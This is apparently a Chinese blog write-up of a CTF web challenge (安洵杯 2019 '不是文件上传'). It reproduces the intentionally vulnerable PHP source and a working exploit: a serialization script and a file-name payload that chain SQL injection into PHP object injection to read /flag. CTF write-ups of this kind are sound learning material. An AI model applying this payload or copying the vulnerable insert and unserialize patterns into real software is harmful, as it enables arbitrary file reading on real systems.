[安洵杯 2019]不是文件上传1

最新推荐文章于 2024-07-15 17:03:25 发布
最新推荐文章于 2024-07-15 17:03:25 发布
阅读量160 收藏
点赞数
文章标签: html php dreamweaver Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62129839/article/details/129161529
版权

给了源码,代码审计

upload.php

<!DOCTYPE html>

<html>

<head>

<title>Image Upload</title>

<link rel="stylesheet" href="./style.css">

<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>

</head>

<body>

<p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150></p>

<div align="center">

<form name="upload" action="" method="post" enctype ="multipart/form-data" >

<input type="file" name="file">

<input type="Submit" value="submit">

</form>

</div>

<br>

<p><a href="./show.php">You can view the pictures you uploaded here</a></p>

<br>

<?php

include("./helper.php");

class upload extends helper {

public function upload_base(){

$this->upload();

}

}

if ($_FILES){

if ($_FILES["file"]["error"]){

die("Upload file failed.");

}else{

$file = new upload();

$file->upload_base();

}

}

$a = new helper();

?>

</body>

</html>

show.php

<!DOCTYPE html>

<html>

<head>

<title>Show Images</title>

<link rel="stylesheet" href="./style.css">

<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>

</head>

<body>

<h2 align="center">Your images</h2>

<p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p>

<hr>

<?php

include("./helper.php");

$show = new show();

if($_GET["delete_all"]){

if($_GET["delete_all"] == "true"){

$show->Delete_All_Images();

}

}

$show->Get_All_Images();

class show{

public $con;

public function __construct(){

$this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");

if (mysqli_connect_errno($this->con)){

die("Connect MySQL Fail:".mysqli_connect_error());

}

}

public function Get_All_Images(){

$sql = "SELECT * FROM images";

$result = mysqli_query($this->con, $sql);

if ($result->num_rows > 0){

while($row = $result->fetch_assoc()){

if($row["attr"]){

$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);

$attr = unserialize($attr_temp);

}

echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";

}

}else{

echo "<p>You have not uploaded an image yet.</p>";

}

mysqli_close($this->con);

}

public function Delete_All_Images(){

$sql = "DELETE FROM images";

$result = mysqli_query($this->con, $sql);

}

}

?>

<p><a href="show.php?delete_all=true">Delete All Images</a></p>

<p><a href="upload.php">Upload Images</a></p>

</body>

</html>

helper.php

<?php

class helper {

protected $folder = "pic/";

protected $ifview = False;

protected $config = "config.txt";

// The function is not yet perfect, it is not open yet.

public function upload($input="file")

{

$fileinfo = $this->getfile($input);

$array = array();

$array["title"] = $fileinfo['title'];

$array["filename"] = $fileinfo['filename'];

$array["ext"] = $fileinfo['ext'];

$array["path"] = $fileinfo['path'];

$img_ext = getimagesize($_FILES[$input]["tmp_name"]);

$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);

$array["attr"] = serialize($my_ext);

$id = $this->save($array);

if ($id == 0){

die("Something wrong!");

}

echo "<br>";

echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";

}

public function getfile($input)

{

if(isset($input)){

$rs = $this->check($_FILES[$input]);

}

return $rs;

}

public function check($info)

{

$basename = substr(md5(time().uniqid()),9,16);

$filename = $info["name"];

$ext = substr(strrchr($filename, '.'), 1);

$cate_exts = array("jpg","gif","png","jpeg");

if(!in_array($ext,$cate_exts)){

die("<p>Please upload the correct image file!!!</p>");

}

$title = str_replace(".".$ext,'',$filename);

return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);

}

public function save($data)

{

if(!$data || !is_array($data)){

die("Something wrong!");

}

$id = $this->insert_array($data);

return $id;

}

public function insert_array($data)

{

$con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");

if (mysqli_connect_errno($con))

{

die("Connect MySQL Fail:".mysqli_connect_error());

}

$sql_fields = array();

$sql_val = array();

foreach($data as $key=>$value){

$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);

$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);

$sql_fields[] = "`".$key_temp."`";

$sql_val[] = "'".$value_temp."'";

}

$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";

mysqli_query($con, $sql);

$id = mysqli_insert_id($con);

mysqli_close($con);

return $id;

}

public function view_files($path){

if ($this->ifview == False){

return False;

//The function is not yet perfect, it is not open yet.

}

$content = file_get_contents($path);

echo $content;

}

function __destruct(){

# Read some config html

$this->view_files($this->config);

}

}

?>

这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计

第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化

跟进

$array["attr"] = serialize($my_ext);

$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);

发现 attr变量实际上是图片的属性长和宽

这里有file_get_contents函数

我审计的时候没看到,wp告诉我的,实际上这个位置很明显

当满足ifview=true时,传入config为./flag路径就能拿到flag

php序列化代码,抄wp的

<?php

class helper

{

protected $ifview = true;

protected $config = "/flag";

}

$a = new helper();

echo serialize($a);

echo '<br>';

echo bin2hex(serialize($a));

抄wp:

因为attr字段列名在最后所以放在第5个位置。又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。

最后用#注释掉’value2’,‘value3’,…防止报错

三行字信息量巨大,全是我不会的小细节

最后传入文件名为

1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png

的图片,查看,得到flag

陈崇拜者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[安洵 2019]不是文件上传
m0_63045593的博客
04-22 2435
[安洵 2019]不是文件上传 信息泄露github的源码 public function view_files($path){ if ($this->ifview == False){ //不用管直接就是FALSE return False; //The function is not yet perfect, it is not open yet. } $content = file_get_contents($path); echo $con
BUUCTF:[安洵 2019]不是文件上传
末初的CSDN博客
03-28 2038
这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入 参考:安洵2019 官方Writeup 获取源码 在网站首页存在一些信息 在gihtub找得到源码 BUU也给出了这题的源码 漏洞分析 在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。 审计代码后可知,图片...
buuCTF [安洵 2019]不是文件上传 1
weixin_45642610的博客
08-06 501
buuCTF [安洵 2019]不是文件上传 1 这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到 三个文件 upload.php <!DOCTYPE html> <html> <head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont
安洵RE(PE_Debug)
11-29
安洵RE(PE_Debug) 拿到题目名字已给出提示PE结构OD打开查看一下字符串
i-SOON_CTF_2018:2018第一届安洵过渡环境源码WP
03-24
AXB-CTF 2018第一届安洵过渡环境/原始码
i-SOON_CTF_2019:2019第二届安洵过渡环境
03-09
【标题】"i-SOON_CTF_2019:2019第二届安洵过渡环境"指的是2019年举办的第二届安洵网络安全竞赛中的一个环节,这个环节涉及到了过渡环境的设置与使用。CTF(Capture The Flag)是网络安全领域常见的竞赛形式,...
17黄锦洵 毕业论文.zip
09-13
【标题】"17黄锦洵 毕业论文.zip" 涉及的是一个压缩文件,其中包含的主要是黄锦洵同学的毕业论文。在IT领域,压缩文件是一种常见的数据存储和传输方式,它通过特定的算法将多个或单个文件打包成一个较小的文件,便于...
17黄锦洵 毕业论文任务书.zip
09-13
【标题】: "17黄锦洵 毕业论文任务书.zip" 是一个压缩文件,其中包含了17级学生黄锦洵的毕业论文任务书。这个文件可能包含了他的研究主题、目标、研究方法以及时间规划等关键信息,是他在完成毕业论文过程中的指导性...
[安洵 2019]不是文件上传 sql注入 发序列化 信息泄漏
a3320315的博客
01-30 2055
题目描述 找了半天也没找到题目的关键点·~~ 看了writeup才知道有个信息泄露 然后在github上下载源码就可以了~~ 解题过程 首先我们拿到一套源码,先找到哪段代码能够读取flag~~ 在helper.php中有一段代码,可以读取文件~~,很明显的反序列化~~ 然后我们在文中找一下序列化和反序列化的点~~ 大概说明一下代码的意思,我们上传图片时,会序列化图片的宽高,然后在show.php中...
# 安浔 (不是文件上传) WP
crispr的博客
12-25 153
安浔 (不是文件上传) 源码审计 help.php <?php class helper { protected $folder = "pic/"; protected $ifview = False; protected $config = "config.txt"; // The function is not yet perfect, it is not open yet. public function upload($input="file") { $fileinfo
[安洵 2019]不是文件上传 文件上传的注入
m0_67401270的博客
05-15 255
进入题目传了一个jpg图片上去 发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.phpdelete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,获得源码的方式长见识了)
CTF--这好像不是文件上传
浅笑996的博客
06-28 696
打开题目F12看到一个被注释的跳转。 访问可以知道是一个文件包含 经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。 使用php://filter读取题目源码得到 http://47.94.221.39:8003/index.php?filename=php://filter/read=convert.base64-encode/resource=index.php 读取upload.php文件源码如下: 可以看出upload文件将上传..
html 关闭信息窗口
cuisidong1997的博客
07-14 334
如果你想要通过点击favicon来关闭一个窗口,你需要添加一个监听器来监听favicon的点击事件,但是由于favicon通常不支持JavaScript事件监听,你可能需要使用一些特殊的技巧,例如监听鼠标移动到favicon上的事件,并通过这种方式触发窗口关闭。如果你是指的是一个favicon(网页标题前的小图标),并且你想要通过点击这个图标来关闭一个信息窗口,那么你需要使用JavaScript来监听favicon的点击事件,并在事件处理函数中执行关闭窗口的操作。html 关闭信息窗口 ico。
HTML-VUE页面调用android 客户端网络请求并返回数据
最新发布
weixin_42504805的博客
07-15 207
确保WebView的设置允许JavaScript接口,并且WebView加载的页面有权限调用这些接口。这样,当用户在Vue页面中点击按钮时,会通过WebView调用Android客户端的网络请求方法,然后将结果回调到Vue页面中显示。在Html-- Vue页面调用Android客户端网络请求并返回数据,通常需要通过WebView与Android客户端的JavaScript接口进行交互。2.在WebView中设置该接口。
[安洵 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个... 具体的操作步骤可以参考以下代码: ... class User { ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值